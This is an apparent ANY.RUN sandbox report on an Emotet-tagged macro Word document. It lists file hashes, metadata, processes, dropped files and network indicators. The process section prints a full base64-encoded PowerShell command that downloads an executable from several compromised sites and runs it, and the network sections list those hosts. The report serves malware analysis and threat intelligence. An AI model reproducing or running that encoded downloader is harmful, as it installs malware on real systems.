analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Rg_BLD-854-IM9070.doc

Full analysis: https://app.any.run/tasks/7d16500b-7ffc-4c11-b473-331544869853
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 12:12:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: copy South Carolina Unbranded, Subject: Cross-group, Author: Mattie Volkman, Comments: magnetic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 07:19:00 2019, Last Saved Time/Date: Fri May 24 07:19:00 2019, Number of Pages: 1, Number of Words: 16, Number of Characters: 92, Security: 0
MD5:

508F84A96933B9B4649FAD80BEDF2AC6

SHA1:

4CF88F051EBFEEB58DB02B45AA53859912DBA949

SHA256:

B355E68F861DE9C9277E48BE511152A659239659796F4E0CEE1F493A1377FD2A

SSDEEP:

3072:m77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q9kyXDXsqq:m77HUUUUUUUUUUUUUUUUUUUT52VYkyXY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2088)
    • Executed via WMI

      • powershell.exe (PID: 2088)
    • PowerShell script executed

      • powershell.exe (PID: 2088)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2928)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2928)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: copy South Carolina Unbranded
Subject: Cross-group
Author: Mattie Volkman
Keywords: -
Comments: magnetic
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:24 06:19:00
ModifyDate: 2019:05:24 06:19:00
Pages: 1
Words: 16
Characters: 92
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Kris Inc
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 107
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Windler
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2928"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rg_BLD-854-IM9070.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2088powershell -nop -e JABLAEwAdABsAEEAWQA9ACcAUABiAG8AMgBrADMANQB6ACcAOwAkAEoAVABDAGEAbQBEAE0AbwAgAD0AIAAnADIAMgAxACcAOwAkAGoAVwB3ADYAaQBJAD0AJwB6ADUAWABYAFMAVQA4ACcAOwAkAEIASQBfAHEAaQB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABKAFQAQwBhAG0ARABNAG8AKwAnAC4AZQB4AGUAJwA7ACQAWgBiAEgAbABLAHoAPQAnAE0AVQB1AEwAagAxACcAOwAkAGkAcQBtAGwAWgBfAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAGAAZQBUAC4AdwBgAEUAYgBDAGwASQBlAGAATgBUADsAJABEAFQANgBoAGEAYgBVADEAPQAnAGgAdAB0AHAAOgAvAC8AYQBwAHAAYQBsAG0AaQBnAGgAdAB5AC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBUAFkAUwBHAG4AdgBKAFUAYQAvAEAAaAB0AHQAcAA6AC8ALwBoAHEAcgBlAG4AZABlAHIAaQBuAGcALgBjAG8AbQAuAGEAdQAvAGkAbQBhAGcAZQAvAGIATwB2AEsASABTAFcAQwBJAFEALwBAAGgAdAB0AHAAOgAvAC8AaQBuAG4AbwB2AGEAdABpAHYAZQB2AGUAdABwAGEAdABoAC4AYwBvAG0ALwBkAHEAZABiAC8AcABhAHAAawBhAGEAMQA3AC8AZgBYAGwAbwBBAHQASwByAGoAVAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYwBhAHYAZQBkAGkAbQBhAHIAbQBvAGMAYQByAHIAYQByAGEALgBjAG8AbQAvAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIALwBVAGkAYgBuAFkAZwBiAHcAbAB2AC8AQABoAHQAdABwADoALwAvAHAAYQBvAG4AdABhAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBHAHcAdgBXAHIAeQBQAEMAcQAvACcALgBTAFAAbABJAFQAKAAnAEAAJwApADsAJABjADQAdABiAFIATABkAD0AJwBhADQANgBEAFYAaABuAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoAYgBrADgAegBCAHUAIABpAG4AIAAkAEQAVAA2AGgAYQBiAFUAMQApAHsAdAByAHkAewAkAGkAcQBtAGwAWgBfAC4AZABPAHcATgBMAG8AYQBEAEYASQBMAEUAKAAkAFoAYgBrADgAegBCAHUALAAgACQAQgBJAF8AcQBpAHcAKQA7ACQAbwBzAGYAYwBrAFMAPQAnAHAAegBRAGQARQBoACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQgBJAF8AcQBpAHcAKQAuAGwAZQBOAEcAdABIACAALQBnAGUAIAAyADAAMAA5ADEAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAVABhAHIAdAAoACQAQgBJAF8AcQBpAHcAKQA7ACQATABHAEMAVAAwAG4AbwA9ACcAZABCADYAdwBHADMANwBoACcAOwBiAHIAZQBhAGsAOwAkAEMAYQBJAEoAYgA0AHAAPQAnAEIAdwBYAEQAbABGAFoATwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwAEYAMgB6AHEAdAB3AFkAPQAnAFUAaQBoAGQAVgByAEIARgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 366
Read events
892
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
9

Dropped files

PID
Process
Filename
Type
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE6B5.tmp.cvr
MD5:
SHA256:
2088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\32NAKQJ88CG3QU2XNMNT.temp
MD5:
SHA256:
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E3608B8.wmfwmf
MD5:2AFAB2C3C3065A6CD238ED0149324323
SHA256:1080D5C0F4B24AAE435BC50622D9534409523DBDE21CD4FE442D02C035EF42D6
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A2FC159.wmfwmf
MD5:961724FF39816D40926BE68AFA9489CF
SHA256:91E75DE5C0320532D6AF1E01E952887D8CD831DDB2154155C143FA7D23A8441E
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D9405CF.wmfwmf
MD5:87A0E0E67FBBFEE547360E93D10C4B8A
SHA256:A563481FD4947D1033FDB364AAF99D631DB7CC6823D805BD8B265711776ADE59
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D274786.wmfwmf
MD5:7F24D37904E0CBDAE447652723AC5CFA
SHA256:9D875B0A2F85E6874AC42301BE0B55C2590A7C767B0D57B014F15E78B1AC9FED
2088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14efcd.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:9A055E41F529D4F01D9EFE03B914EC6E
SHA256:88F036FE86AB0F089ACE7AF1B33F6A593D4F69DE1EAD7206ED4A959DDBE9E188
2928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6FDFDD9A.wmfwmf
MD5:E16DCE6072F395A2308F04F099C1FBDA
SHA256:E391CA2126D835389B78C4B3AC5F6B1F6C4449B21F6AD31B82F19389A9DCE615
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_BLD-854-IM9070.docpgc
MD5:B6439C58EBD4C1A81EF889CB8A128091
SHA256:EF7E6BF9AED18F974D95B9AFDB9EA462887908F1801C8DC0A211A40326ED84B1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2088
powershell.exe
GET
404
45.56.86.30:80
http://innovativevetpath.com/dqdb/papkaa17/fXloAtKrjT/
US
xml
345 b
unknown
2088
powershell.exe
GET
404
192.99.109.117:80
http://hqrendering.com.au/image/bOvKHSWCIQ/
CA
xml
345 b
suspicious
2088
powershell.exe
GET
404
207.55.246.132:80
http://appalmighty.com/wp-includes/TYSGnvJUa/
US
xml
345 b
suspicious
2088
powershell.exe
GET
404
107.150.32.221:80
http://paontaonline.com/wp-admin/GwvWryPCq/
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2088
powershell.exe
192.99.109.117:80
hqrendering.com.au
OVH SAS
CA
suspicious
2088
powershell.exe
45.56.86.30:80
innovativevetpath.com
Linode, LLC
US
unknown
2088
powershell.exe
207.55.246.132:80
appalmighty.com
CONTINENTAL BROADBAND PENNSYLVANIA, INC.
US
suspicious
2088
powershell.exe
217.182.138.155:443
www.cavedimarmocarrara.com
OVH SAS
FR
unknown
2088
powershell.exe
107.150.32.221:80
paontaonline.com
DataShack, LC
US
suspicious

DNS requests

Domain
IP
Reputation
appalmighty.com
  • 207.55.246.132
suspicious
hqrendering.com.au
  • 192.99.109.117
suspicious
innovativevetpath.com
  • 45.56.86.30
unknown
www.cavedimarmocarrara.com
  • 217.182.138.155
unknown
paontaonline.com
  • 107.150.32.221
unknown

Threats

No threats detected
No debug info